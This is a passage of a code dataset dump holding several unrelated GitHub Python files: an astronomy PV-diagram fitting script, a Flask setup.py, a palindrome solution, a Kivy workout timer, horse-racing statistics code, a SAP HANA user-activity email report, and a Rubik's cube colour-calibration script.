Keplerian_Rotation(mass_plus_err, velocities, d_source, inclination)\n\n #Changing the radii to the correct pixel coordinates for correct \n #plotting. Plus bring the lines to the object. \n radii_positive_pixel_coor = radii_positive/pixel_size_y_arcsec + (y_size - 1.0)/2.0 + offset\n radii_negative_pixel_coor = radii_negative/pixel_size_y_arcsec + (y_size - 1.0)/2.0 + offset\n\n radii_positive_min_err_pixel_coor = radii_positive_min_err/pixel_size_y_arcsec + (y_size - 1.0)/2.0 + offset \n radii_negative_min_err_pixel_coor = radii_negative_min_err/pixel_size_y_arcsec + (y_size - 1.0)/2.0 + offset\n\n radii_positive_plus_err_pixel_coor = radii_positive_plus_err/pixel_size_y_arcsec + (y_size - 1.0)/2.0 + offset \n radii_negative_plus_err_pixel_coor = radii_negative_plus_err/pixel_size_y_arcsec + (y_size - 1.0)/2.0 + offset\n\n ax.plot(np.arange(0,len(radii_positive), 1), radii_positive_pixel_coor, color = 'white', linestyle = ':')\n ax.plot(np.arange(len(radii_positive) , len(velocities), 1), radii_negative_pixel_coor, color = 'white', linestyle = ':')\n\n ax.plot(np.arange(0,len(radii_positive), 1), radii_positive_min_err_pixel_coor, color = 'white', linestyle = ':')\n ax.plot(np.arange(len(radii_positive) , len(velocities), 1), radii_negative_min_err_pixel_coor, color = 'white', linestyle = ':')\n\n ax.plot(np.arange(0,len(radii_positive), 1), radii_positive_plus_err_pixel_coor, color = 'white', linestyle = ':')\n ax.plot(np.arange(len(radii_positive) , len(velocities), 1), radii_negative_plus_err_pixel_coor, color = 'white', linestyle = ':')\n\nax.axhline(np.where(y_arcsec > 0)[0][0] - 1 + offset, color = 'white', linestyle = '--')\nax.axvline(np.where(velocities > 0)[0][0] - 0.33 , color = 'white', linestyle = '--')\n#ax.legend(loc = 3)\n\n#---------------------------------------------------------------------------\n#Contour lines\n#---------------------------------------------------------------------------\nPVSHAPE = PV_Data.shape\ncontour_region = (60,70,1200,1300)\nprint(contour_region)\nplot_c_region = True\nstd_PV = np.std(PV_Data[contour_region[2]:contour_region[3],contour_region[0]:contour_region[1]]) \nprint(f'Std:{std_PV}')\n\nPV_Contour_Levels = np.array([x * std_PV for x in range(contour_max) if x >= contour_min and ((x - contour_min) % contour_interval) == 0])\n\n\n# plot cyan\ncs = ax.contour(PV_Data, PV_Contour_Levels, colors = 'white')\n\ndef pix_2_arc(pix):\n return (pix - pix_arcsec_central) * pixel_size_y_arcsec\n\ndef pix_2_vel(pix):\n return (pix - pix_v_source ) *delta_v + v_source\n\ndef arc_2_pix(arc):\n return (arc / pixel_size_y_arcsec) + pix_arcsec_central\n\ndef vel_2_pix(arc):\n return ((arc - v_source) / delta_v) + pix_v_source\n\ndef get_dupes(a):\n from collections import Counter\n return np.array([item for item, count in Counter(a).iteritems() if count > 1])\n\ndef fit(v, m):\n a = np.sin(inclination*np.pi / 180.)**2*const.G.value*m*const.M_sun.value/(v*1000)/(v*1000)/(d_source*u.pc.to(u.m))*u.rad.to(u.arcsec)\n return a\ndef inv(x, a, b, c):\n return a / (x - b) ** 2 + c\n\ndef maxy(a):\n x,y = a[:,0], a[:,1]\n retx = list(set(x))\n ret = []\n for col in retx:\n idx = np.where(x == col)[0]\n maxy = np.max(y[idx])\n ret.append(np.array([col, maxy]))\n return np.array(ret)\n\ndef lnlike(theta, x, y, yerr):\n m, lnf = theta\n model = fit(x, m)\n inv_sigma2 = 1.0/(yerr**2 + model**2*np.exp(2*lnf))\n return -0.5*(np.sum((y-model)**2*inv_sigma2 - np.log(inv_sigma2)))\n\ndef lnprior(theta):\n m, lnf = theta\n if 0.1 < m < 2. and -10.0 < lnf < 5.0:\n return 0.0\n return -np.inf\n\n\ndef lnprob(theta, x, y, yerr):\n lp = lnprior(theta)\n if not np.isfinite(lp):\n return -np.inf\n return lp + lnlike(theta, x, y, yerr)\n\ndef closest_approach(node, nodes):\n a = np.sum((nodes - node) ** 2, axis=1)\n return np.argmin(a)\n\n@deprecated\ndef error_prop(r,v,m):\n a = (v*1000)**2/ const.G.value / (np.sin(inclination * np.pi / 180.) ** 2) / u.rad.to(u.arcsec)\n l1 = (r * dis_err + d_source * yerr) * a * u.pc.to(u.m)\n l2 = 2. * m * const.M_sun.value * (v_err / v)\n return l1 + l2\n\n\nprint('Running EMCEE Fitter')\nif fit_pv:\n cuttoff = cut * std_PV\n prev = 0\n fit_pt = []\n for i, row in enumerate(PV_Data):\n row = np.array(row)\n regions = np.where(row > cuttoff)\n if len(regions[0]) > 0:\n if i < pix_arcsec_central:\n # bottom\n loca = np.max(regions[0])\n else:\n # top\n loca = np.min(regions[0])\n prev = loca\n fit_pt.append(np.array([loca,i]))\n rows_cut = len(fit_pt)\n for i, col in enumerate(PV_Data.T):\n col = np.array(col)\n regions = np.where(col > cuttoff)\n if len(regions[0]) > 0:\n if i < pix_v_source:\n # bottom\n loca = np.max(regions[0])\n else:\n # top\n loca = np.min(regions[0])\n prev = loca\n fit_pt.append(np.array([loca,i]))\n fit_pt = np.array(fit_pt,dtype=float)\n fit_o = fit_pt.copy()\n _, idx = np.unique(fit_pt[:,0], return_index=True)\n mask = np.ones(fit_pt[:,0].shape,dtype=bool)\n mask[idx] = False\n fit_pt = fit_pt[mask, :]\n\n with open('points.txt', 'w') as f:\n fit_ar = np.array(fit_pt,dtype=float)\n fit_ar[:,0] = pix_2_vel(fit_ar[:,0])\n fit_ar[:,1] = pix_2_arc(fit_ar[:,1])\n idx = np.where(fit_ar[:,0] <= 10)[0]\n x = fit_ar[idx,0] \n y = fit_ar[idx,1]\n fit_ar = np.array([x,y]).T\n idx = np.where(fit_ar[:,1] <= 5)[0]\n x = fit_ar[idx,0] \n y = fit_ar[idx,1]\n fit_ar = np.array([x,y]).T\n np.savetxt(f, fit_ar, delimiter=';')\n\n print(f'v_source, pixel_size_y_arcsec, pix_v_source,pix_v_source,delta_v={\",\".join(list(map(str,[v_source, pixel_size_y_arcsec, pix_v_source,pix_v_source,delta_v])))}')\n\n t_data = fit_ar.copy()\n t_data[:,1] = np.abs(fit_ar[:,1])\n t_data[:,0] -= v_source\n\n t_data = maxy(t_data)\n idx = np.where(t_data[:,1] >= yerr)[0]\n t_data = t_data[idx,:]\n x = vel_2_pix(t_data[:,0]+v_source)\n trans = t_data.copy()\n for i,loca in enumerate(x):\n if i < rows_cut:\n c = 'darkcyan'\n else:\n c = 'cyan'\n if loca < pix_v_source:\n tmp = arc_2_pix(t_data[i,1])\n ax.scatter(loca, tmp, color=c,lw=1,marker='.')\n else:\n tmp = arc_2_pix(-1.*t_data[i,1])\n ax.scatter(loca, tmp, color=c,lw=1,marker='.')\n trans[i,:] = np.array([loca,tmp])\n # embed()\n # now convert t_data to fit_ar\n xr = np.linspace(pix_v_source+2, PVSHAPE[1], 1000)\n xl = np.linspace(0, pix_v_source-2, 1000)\n\n ndim, nwalkers = 2, 100\n x = t_data[:,0]\n y = t_data[:,1]\n m_true = mass\n f_true = yerr\n \n nll = lambda *args: -lnlike(*args)\n result = op.minimize(nll, [m_true, np.log(f_true)], args=(x, y, yerr))\n m_ml, lnf_ml = result[\"x\"]\n pos = [result[\"x\"] + yerr*np.random.randn(ndim) for i in range(nwalkers)]\n\n sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, args=(x, y, yerr))\n sampler.run_mcmc(pos, 2000)\n samples = sampler.chain[:, 50:, :].reshape((-1, ndim))\n m_true = np.median(samples[:,0])\n f_true = np.median(samples[:,1])\n print('Plotting Emcee Fits')\n\n c = 0\n for m, lnf in samples[np.random.randint(len(samples), size=100)]:\n ax.plot(xl, inv(xl, m /pixel_size_y_arcsec / delta_v**2, pix_v_source, pix_arcsec_central), color=\"k\", alpha=0.1)\n ax.plot(xr, inv(xr, -1 * m /pixel_size_y_arcsec / delta_v**2, pix_v_source, pix_arcsec_central), color=\"k\", alpha=0.1)\n c = 1E10\n left = np.array([xl,inv(xl, m_true /pixel_size_y_arcsec / delta_v**2, pix_v_source, pix_arcsec_central)]).T\n idx = closest_approach(np.array([pix_v_source, pix_arcsec_central]), left)\n closest = left[idx]\n print(f'Close pix: {closest}\\nClose km/s,\\'\\': {pix_2_vel(closest[0])},{pix_2_arc(closest[1])}')\n ep = error_prop(pix_2_arc(closest[1]),pix_2_vel(closest[0]),m_true)\n print(f'Observational Error M: {ep/msun} Solm')\n\n cfig = corner.corner(samples, labels=[\"$m$\", \"$\\ln\\,f$\"],\n truths=[m_true, f_true])\n cfig.savefig(\"triangle.png\",dpi=600)\n\n\n samples[:, 1] = np.exp(samples[:, 1])\n m_mcmc, f_mcmc = map(lambda v: (v[1], v[1]-v[0]),\n zip(*np.percentile(samples, [16, 50, 84],\n axis=0)))\n print(f'M:{m_true}..{m_mcmc}\\nE:{f_true}..{f_mcmc}')\n ax.plot(xl, inv(xl, m_true /pixel_size_y_arcsec / delta_v**2, pix_v_source, pix_arcsec_central), color=\"C\", alpha=1,label=f'Mass: {m_true:.2f} M$_\\odot$')\n ax.plot(xr, inv(xr, -1.* m_true /pixel_size_y_arcsec / delta_v**2, pix_v_source, pix_arcsec_central), color=\"C\", alpha=1)\n mass = m_true\n\nif plot_orbital:\n #embed()\n print('Plotting Orbital')\n p = cs.collections[0].get_paths()[1]\n v = p.vertices\n xCen = v[:,0]\n yCen = v[:,1]\n leftX = np.argmin(xCen)#[0]\n rightX = np.argmax(xCen)#[0]\n botY = np.argmin(yCen)#[0]\n topY = np.argmax(yCen)#[0]\n points = np.array([[xCen[leftX],yCen[leftX]],[xCen[rightX],yCen[rightX]],\\\n [xCen[botY],yCen[botY]],[xCen[topY],yCen[topY]]])\n points = points.reshape(-1,2)\n print('Points:',leftX,rightX,botY,topY)\n print(PV_Data.shape)\n print(points)\n\n points[0,:] = [66, 1410] \n #points[1,:] = [108.0384714, 1383.]\n #points[2,:] = [94., 1174.01457681] \n #points[3,:] = [84., 1588.57664791] \n\n print([points[0,0],points[0,1]],[points[1,0],points[1,1]])\n\n def findSlope(x1,y1,x2,y2):\n return (y1-y2)/(x1-x2),y2-((y1-y2)/(x1-x2)*x2)\n\n def findInter(m1,b1,m2,b2):\n return (b2-b1)/(m1-m2),m2*(b2-b1)/(m1-m2) + b2\n\n\n slope1 = findSlope(points[0,0],points[0,1],points[1,0],points[1,1])\n slope2 = findSlope(points[2,0],points[2,1],points[3,0],points[3,1])\n print('Slopes:',slope1,slope2)\n\n newCenter = findInter(*slope1,*slope2)\n print('Center:',newCenter)\n\n newCenterX = round(velocities[int(newCenter[0])]+v_source,2)\n newCenterY = round(y_arcsec[int(newCenter[1])],3)\n\n ax.scatter(points[:,0],points[:,1],color='C',marker='o',\\\n label=f'Center:({newCenterX} km '+r's$^{-1}$, '+\\\n f'{newCenterY}' + r'$^{\\prime\\prime}$)')\n ax.plot((points[0,0],points[1,0]),(points[0,1],points[1,1]),'--c',lw=1)\n ax.plot((points[2,0],points[3,0]),(points[2,1],points[3,1]),'--c',lw=1)\n\nprint('Finished Plotting')\n\nfig.legend(loc=1,fontsize='x-small')\nfig.tight_layout()\nfig.savefig(\"PV-Diagram_L1448IRS3B_C17O_image_taper1500k.fit.png\",dpi=600)\n","repo_name":"nickalaskreynolds/nkrpy","sub_path":"bin/misc/newPVPlot.py","file_name":"newPVPlot.py","file_ext":"py","file_size_in_byte":18040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33412978268","text":"from setuptools import setup\nimport os\nimport re\n\n# Get the version string. Cannot be done with import!\nwith open(os.path.join('flask_yourext', 'version.py'), 'rt') as f:\n version = re.search(\n '__version__\\s*=\\s*\"(?P.*)\"\\n',\n f.read()\n ).group('version')\n\nsetup(\n name='Flask-YourExt',\n version=version,\n url='http://github.com/inveniosoftware/flask-yourext/',\n license='GPLv2',\n author='Invenio collaboration',\n author_email='info@invenio-software.org',\n description='Flask-YourExt is an extension for Flask that CHANGEME.',\n long_description=open('README.rst').read(),\n packages=['flask_yourext', 'flask_yourext.apackage'],\n zip_safe=False,\n include_package_data=True,\n platforms='any',\n install_requires=[\n 'Flask',\n 'six',\n ],\n classifiers=[\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ],\n test_suite='nose.collector',\n tests_require=['nose', 'coverage'],\n)\n","repo_name":"lnielsen/flask-ext-skeleton","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"42049521763","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n if x<0:\n return False\n num=str(x)\n l=0\n r=len(num)-1\n\n while l<=r:\n if num[l]!=num[r]:\n return False\n l=l+1\n r=r-1\n\n return True\n","repo_name":"soikat1139/solvingLeetcode","sub_path":"Palindrome Number.py","file_name":"Palindrome Number.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7754577354","text":"from kivymd.app import MDApp\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen, NoTransition\nfrom kivy.core.window import Window\nfrom kivy.metrics import dp\nfrom kivy.properties import StringProperty\nfrom kivy.clock import Clock\nfrom gen_functions import *\n\n# Calibrations window\nWINDOW_WIDTH = dp(500)\nWINDOW_HEIGHT = dp(800)\n\nclass WindowManager(ScreenManager):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.transition = NoTransition()\n Window.size = (WINDOW_WIDTH, WINDOW_HEIGHT)\n\n # Start workout\n def start_workout(self):\n # Check start conditions\n if self.screens[0].number_of_sets_int > 0 and \\\n self.screens[0].rest_duration_s > 0 and \\\n self.screens[0].workout_duration_s > 0:\n self.current = self.screens[1].name\n Clock.schedule_interval(self.update, 1)\n\n # Init of set label and workout timer\n self.current_set = self.screens[0].number_of_sets_int\n self.timer = self.screens[0].rest_duration_s\n self.workout_state = \"REST\"\n\n # Init values for workout screen\n self.screens[1].current_set = str(self.current_set)\n self.screens[1].timer_value = convert_s_to_min_s_str(self.timer)\n self.screens[1].workout_state = self.workout_state\n\n else:\n print('No workout')\n\n\n # Stop workout\n def stop_workout(self):\n self.current = self.screens[0].name\n Clock.unschedule(self.update)\n\n # Update the workout screen\n def update(self, dt):\n self.timer -= 1\n if self.timer == 0:\n if self.workout_state == \"REST\":\n self.workout_state = \"WORKOUT\"\n self.timer = self.screens[0].workout_duration_s\n else:\n self.workout_state = \"REST\"\n self.timer = self.screens[0].rest_duration_s\n self.current_set -= 1\n else:\n pass\n\n # Workout is finished\n if self.current_set == 0:\n self.stop_workout()\n\n # Update labels\n self.screens[1].current_set = str(self.current_set)\n self.screens[1].timer_value = convert_s_to_min_s_str(self.timer)\n self.screens[1].workout_state = self.workout_state\n\n\nclass MainWindow(Screen):\n number_of_sets = StringProperty('0')\n workout_duration = StringProperty('00:00')\n rest_duration = StringProperty('00:00')\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.number_of_sets_int = 0\n self.number_of_sets = str(self.number_of_sets)\n self.workout_duration_s = 0\n self.workout_duration = convert_s_to_min_s_str(self.workout_duration_s)\n self.rest_duration_s = 0\n self.rest_duration = convert_s_to_min_s_str(self.rest_duration_s)\n\n\n def sets_plus(self):\n self.number_of_sets_int +=1\n self.number_of_sets = str(self.number_of_sets_int)\n\n def sets_minus(self):\n if self.number_of_sets_int <= 1:\n pass\n else:\n self.number_of_sets_int -=1\n self.number_of_sets = str(self.number_of_sets_int)\n\n def work_plus(self):\n self.workout_duration_s +=1\n self.workout_duration = convert_s_to_min_s_str(self.workout_duration_s)\n\n def work_minus(self):\n if self.workout_duration_s <= 0:\n pass\n else:\n self.workout_duration_s -= 1\n self.workout_duration = convert_s_to_min_s_str(self.workout_duration_s)\n\n def rest_plus(self):\n self.rest_duration_s +=1\n self.rest_duration = convert_s_to_min_s_str(self.rest_duration_s)\n\n def rest_minus(self):\n if self.rest_duration_s <= 0:\n pass\n else:\n self.rest_duration_s -= 1\n self.rest_duration = convert_s_to_min_s_str(self.rest_duration_s)\n\n\nclass WorkOutWindow(Screen):\n current_set = StringProperty(\"\")\n timer_value = StringProperty(\"\")\n workout_state = StringProperty(\"\")\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n\nclass MainApp(MDApp):\n\n def build(self):\n self.title = \"Workout\"\n self.theme_cls.theme_style = \"Dark\"\n self.theme_cls.primary_palette = \"Orange\"\n kv = Builder.load_file(\"layout.kv\")\n return kv\n\n def on_start(self):\n Clock.schedule_once(self.init_floating_buttons, 1)\n\n def init_floating_buttons(self, dt):\n self.root_window.children[0].screens[0].ids['start'].size = [WINDOW_WIDTH/5, WINDOW_WIDTH/5]\n self.root_window.children[0].screens[1].ids['stop'].size = [WINDOW_WIDTH/5, WINDOW_WIDTH/5]\n\n\nif __name__ == \"__main__\":\n try:\n app = MainApp()\n app.run()\n except:\n pass\n","repo_name":"bavodenys/Kivy_examples","sub_path":"WorkOutTimer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"35717955874","text":"from common import common\r\n\r\n\r\ndef __getOnRaceStarts(rows):\r\n one_race_starts_dict = {} # horse_code & [No1, No2, No3, No4, ALL]\r\n for row in rows:\r\n horse_code = row['horse_code']\r\n if horse_code not in one_race_starts_dict.keys():\r\n one_race_starts_dict[horse_code] = [0, 0, 0, 0, 0]\r\n if row['plc'] not in common.words:\r\n one_race_starts_dict[horse_code][4] += 1\r\n plc = int(row['plc'].replace('DH', ''))\r\n if plc == 1:\r\n one_race_starts_dict[horse_code][0] += 1\r\n elif plc == 2:\r\n one_race_starts_dict[horse_code][1] += 1\r\n elif plc == 3:\r\n one_race_starts_dict[horse_code][2] += 1\r\n elif plc == 4:\r\n one_race_starts_dict[horse_code][3] += 1\r\n return one_race_starts_dict\r\n\r\n\r\ndef __calculateHorseStar(history_rows):\r\n results_dict = {} # new_race_id & {horse_code & [No1, No2, No3, No4, ALL]}\r\n sum_start_dict = {} # horse_code & [No1, No2, No3, No4, ALL]\r\n # 按照比赛日期排序\r\n dict_race_id_rows = {} # new_race_id & [row1, row2, ...]\r\n for row_orig in history_rows:\r\n new_race_id = int(str(row_orig['race_date']) + common.toThreeDigitStr(row_orig['race_id']))\r\n if new_race_id not in dict_race_id_rows.keys():\r\n dict_race_id_rows[new_race_id] = []\r\n dict_race_id_rows[new_race_id].append(row_orig)\r\n sorted_race_id = sorted(dict_race_id_rows.keys())\r\n # 计算每场比赛的starts数据\r\n for race_id in sorted_race_id:\r\n if race_id not in results_dict.keys():\r\n results_dict[race_id] = {}\r\n curRaceRows = dict_race_id_rows[race_id]\r\n\r\n # 赛前\r\n for row in curRaceRows:\r\n horse_code = row['horse_code']\r\n if horse_code in sum_start_dict.keys():\r\n curData = sum_start_dict[horse_code]\r\n results_dict[race_id][horse_code] = [curData[0], curData[1], curData[2], curData[3], curData[4]]\r\n else:\r\n results_dict[race_id][horse_code] = [0, 0, 0, 0, 0]\r\n\r\n # 赛后,累加本场场次\r\n curRace_starts_dict = __getOnRaceStarts(curRaceRows) # horse_code & [No1, No2, No3, No4, ALL]\r\n for row in curRaceRows:\r\n horse_code = row['horse_code']\r\n if horse_code not in sum_start_dict.keys():\r\n sum_start_dict[horse_code] = [0, 0, 0, 0, 0]\r\n curData = curRace_starts_dict[horse_code]\r\n for index in range(len(sum_start_dict[horse_code])):\r\n sum_start_dict[horse_code][index] += curData[index]\r\n return results_dict, sum_start_dict\r\n\r\n\r\ndef getHorseStartsDict(history_rows):\r\n dict_race_start, dict_allRace_start = __calculateHorseStar(history_rows)\r\n return dict_race_start, dict_allRace_start\r\n","repo_name":"JudyPhy/spider","sub_path":"20190413/historyData_model2/horse_starts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4373736757","text":"#Import your dependencies\r\nimport platform\r\nfrom hdbcli import dbapi\r\nfrom datetime import datetime, timedelta\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nimport logging\r\nimport argparse\r\n\r\n#Start the logger\r\nlogging.basicConfig(level=logging.INFO)\r\nlogger = logging.getLogger()\r\n\r\n#Parsing arguments\r\nparser = argparse.ArgumentParser(description=\"Report of SAP* and DDIC usage\", prog='hdbReport.py', usage='%(prog)s [options]')\r\nparser.add_argument(\"-snd\", \"--sendmail\", required=True, type=str, help=\"Mail of sender\")\r\nparser.add_argument(\"-dst\", \"--receivers\", required=True, type=str, help=\"List of mails to receive the report splitted wiht ;\")\r\nparser.add_argument(\"-mx\", \"--smtp\", required=True, type=str, help=\"SMTP Server to send the report\")\r\nparser.add_argument(\"-dt\", \"--deltadays\", required=True, type=int, help=\"How much delta to use for the report\")\r\nparser.add_argument(\"-hdbk\", \"--hdbsecstorekey\", required=True, type=str, help=\"Which key to use for the HANA DB Connection\")\r\nargs = parser.parse_args()\r\n\r\nusersIds=('DDIC', 'SAP*')\r\nyesterday = datetime.now() - timedelta(args.deltadays)\r\nqueryTimestamp = datetime.strftime(yesterday, '%Y%m%d%H%M%S')\r\nresult = ''\r\nresult += '
REPORT FROM {0} to {1} FOR USERS {2}
'.format(datetime.strftime(yesterday, '%Y-%m-%d %H:%M:%S'), datetime.today().strftime('%Y-%m-%d %H:%M:%S'), usersIds)\r\nme = args.sendmail\r\nyou = args.receivers\r\nmxServer = args.smtp\r\n\r\nmsg = MIMEMultipart('alternative')\r\nmsg['From'] = me\r\nmsg['To'] = you\r\nmsg['Subject'] = \"REPORT {0}\".format(datetime.today().strftime('%Y-%m-%d'))\r\n\r\n#verify the architecture of Python\r\nprint (\"Platform architecture: \" + platform.architecture()[0])\r\n\r\n#connect to HANA using the hdbuserstore entry\r\nconn = dbapi.connect(\r\n #Option 1, retrieve the connection parameters from the hdbuserstore\r\n key=args.hdbsecstorekey, # address, port, user and password are retrieved from the hdbuserstore\r\n\r\n)\r\n\r\n#open the SQL cursor\r\ncursor = conn.cursor()\r\n\r\n#Prepare and run the query, then close the cursor\r\nsql_command = \"SELECT connector,user_id,action,execution_date,terminal,program_id FROM GRACACTUSAGE WHERE execution_date > {0} and user_id in {1}\".format(queryTimestamp, usersIds)\r\ncursor.execute(sql_command)\r\nrows = cursor.fetchall()\r\ncursor.close()\r\nconn.close()\r\n\r\n#exit if no results\r\nif ( len(rows) == 0 ):\r\n quit()\r\n\r\n#Results to HTML\r\nfor row in rows:\r\n result += \"\"\r\n for col in row:\r\n result += \"\" % col\r\n result += \"\"\r\n\r\n#Close the results html table\r\nresult += \"
%s
\"\r\n\r\n#Prepare mail body in both html and text\r\ntext = result\r\nhtml = result\r\npart1 = MIMEText(text, 'plain')\r\npart2 = MIMEText(html, 'html')\r\nmsg.attach(part1)\r\nmsg.attach(part2)\r\n\r\n#Send the email\r\ns = smtplib.SMTP(mxServer)\r\ns.sendmail(me, you, msg.as_string())\r\ns.quit()\r\n\r\nquit()\r\n\r\n\r\n","repo_name":"diegohmarciano/automation_scripts","sub_path":"HANA/Query reported as HTML/hdbReport.py","file_name":"hdbReport.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7033729808","text":" #### MADE BY ABHIJEET BHATTA ####\r\nimport cv2\r\nimport numpy as np\r\nfrom Rubiks_draw import *\r\nfrom solve import *\r\n# CALIBRATION OF COLOURS\r\ncalib_vid = cv2.VideoCapture(0)\r\ncalib_vid.set(3, 900)\r\ncalib_vid.set(4, 900)\r\ncount = 0 # for list index\r\ncapture = 0\r\ncolor = np.zeros([6, 3]) # stores the average values of Y Cr Cb over a particular cubelet\r\nlsts = [\"white\", \"blue\", \"yellow\", \"green\", \"orange\", \"red\"] # for displaying which colour to show\r\nwhile count < 6:\r\n success, calib_img = calib_vid.read()\r\n calib_img = cv2.flip(calib_img, 1)\r\n calib_ycb = cv2.cvtColor(calib_img, cv2.COLOR_BGR2YCR_CB)\r\n\r\n cv2.rectangle(calib_img, (490, 10), (880, 70), (255, 255, 255), -1)\r\n cv2.putText(calib_img, \"Put the correct color in the square\", (500, 50), cv2.FONT_ITALIC, 1, (0, 0, 255), 3)\r\n cv2.rectangle(calib_img, (490, 70), (880, 120), (255, 255, 255), -1)\r\n cv2.putText(calib_img, \"press 'S' to save\", (530, 110), cv2.FONT_ITALIC, 1, (0, 0, 255), 3)\r\n # Red rectangle when normal; green flash when capture\r\n if capture != 0:\r\n capture = (capture + 1) % 10\r\n cv2.rectangle(calib_img, (260, 260), (320, 320), (0, 255, 0), 2)\r\n else:\r\n cv2.rectangle(calib_img, (260, 260), (320, 320), (0, 0, 255), 2)\r\n\r\n Cr = 0\r\n Cb = 0\r\n luma = 0\r\n averager = 0\r\n cv2.rectangle(calib_img, (210, 170), (430, 245), (255, 255, 255), -1)\r\n cv2.putText(calib_img, lsts[count], (215, 230), cv2.FONT_ITALIC, 2, (0, 0, 0), 5)\r\n if cv2.waitKey(10) == ord('s'):\r\n for x in range(275, 306):\r\n for y in range(275, 306):\r\n luma += calib_ycb[x, y, 0]\r\n Cb += calib_ycb[x, y, 1]\r\n Cr += calib_ycb[x, y, 2]\r\n averager += 1\r\n Cr = Cr / averager\r\n Cb = Cb / averager\r\n luma = luma / averager\r\n color[count] = [luma, Cb, Cr]\r\n count += 1\r\n capture = 1\r\n cv2.imshow(\"CALIBRATE COLOUR\", calib_img)\r\n # cv2.imshow(\"hsv\", calib_ycb)\r\n\r\ncv2.destroyWindow(\"CALIBRATE COLOUR\")\r\n\r\n\r\n# Returns which particular colour is a given cubelet\r\ndef get_color(image, xlow_bound, xup_bound, ylow_bound, yup_bound):\r\n diff_orange = 0\r\n diff_red = 0\r\n diff_blue = 0\r\n diff_white = 0\r\n diff_green = 0\r\n diff_yellow = 0\r\n avg = 0\r\n for i in range(1, 3):\r\n avg = 0\r\n for b in range(xlow_bound, xup_bound):\r\n for a in range(ylow_bound, yup_bound):\r\n avg += 1\r\n diff_orange += abs(image[a, b, i] - color[4][i])\r\n diff_red += abs(image[a, b, i] - color[5][i])\r\n diff_blue += abs(image[a, b, i] - color[1][i])\r\n diff_white += abs(image[a, b, i] - color[0][i])\r\n diff_yellow += abs(image[a, b, i] - color[2][i])\r\n diff_green += abs(image[a, b, i] - color[3][i])\r\n diff_orange = diff_orange/avg\r\n diff_red = diff_red / avg\r\n diff_blue = diff_blue / avg\r\n diff_white = diff_white / avg\r\n diff_yellow = diff_yellow / avg\r\n diff_green = diff_green / avg\r\n\r\n sort_list = [diff_white, diff_blue, diff_yellow, diff_green, diff_orange, diff_red]\r\n index = 0\r\n element = sort_list[0]\r\n for i in range(6):\r\n if sort_list[i] < element:\r\n element = sort_list[i]\r\n index = i\r\n if index == 4:\r\n return [0, 165, 255]\r\n elif index == 5:\r\n return [0, 0, 255]\r\n elif index == 1:\r\n return [255, 0, 0]\r\n elif index == 0:\r\n return [255, 255, 255]\r\n elif index == 2:\r\n return [0, 255, 255]\r\n elif index == 3:\r\n return [0, 255, 0]\r\n\r\n\r\nborder_offset = 20 # it excludes these many pixels from the borders of a cubelet\r\nface_count = 0\r\nface_list = []\r\ntotal_list = []\r\ncapture = 0\r\nwhile face_count < 6:\r\n face_list = []\r\n success, img = calib_vid.read()\r\n img = cv2.flip(img, 1)\r\n img_ycb = cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)\r\n cv2.rectangle(img, (90, 70), (410, 120), (255, 255, 255), -1)\r\n cv2.putText(img, \"press 'S' to save\", (130, 110), cv2.FONT_ITALIC, 1, (0, 0, 255), 3)\r\n\r\n if face_count == 1 or face_count == 3 or face_count == 5:\r\n cv2.arrowedLine(img, (420, 200), (420, 380), (255, 0, 0), 10)\r\n cv2.arrowedLine(img, (160, 200), (160, 380), (255, 0, 0), 10)\r\n elif face_count == 2 or face_count == 4:\r\n cv2.arrowedLine(img, (380, 160), (200, 160), (255, 0, 0), 10)\r\n cv2.arrowedLine(img, (380, 420), (200, 420), (255, 0, 0), 10)\r\n # centre red grid\r\n if capture != 0:\r\n capture = (capture + 1) % 5\r\n cv2.rectangle(img, (200, 200), (380, 380), (0, 255, 0), 2)\r\n cv2.line(img, (200, 260), (380, 260), (0, 255, 0), 2)\r\n cv2.line(img, (200, 320), (380, 320), (0, 255, 0), 2)\r\n cv2.line(img, (260, 200), (260, 380), (0, 255, 0), 2)\r\n cv2.line(img, (320, 200), (320, 380), (0, 255, 0), 2)\r\n else:\r\n cv2.rectangle(img, (200, 200), (380, 380), (0, 0, 255), 2)\r\n cv2.line(img, (200, 260), (380, 260), (0, 0, 255), 2)\r\n cv2.line(img, (200, 320), (380, 320), (0, 0, 255), 2)\r\n cv2.line(img, (260, 200), (260, 380), (0, 0, 255), 2)\r\n cv2.line(img, (320, 200), (320, 380), (0, 0, 255), 2)\r\n\r\n # finding colours and displaying at the top right corner\r\n c = get_color(img_ycb, 200 + border_offset, 260 - border_offset, 200 + border_offset, 260 - border_offset)\r\n cv2.rectangle(img, (550, 10), (590, 50), c, -1) # top left\r\n face_list.append(c)\r\n\r\n c = get_color(img_ycb, 260 + border_offset, 320 - border_offset, 200 + border_offset, 260 - border_offset)\r\n cv2.rectangle(img, (590, 10), (630, 50), c, -1) # top mid\r\n 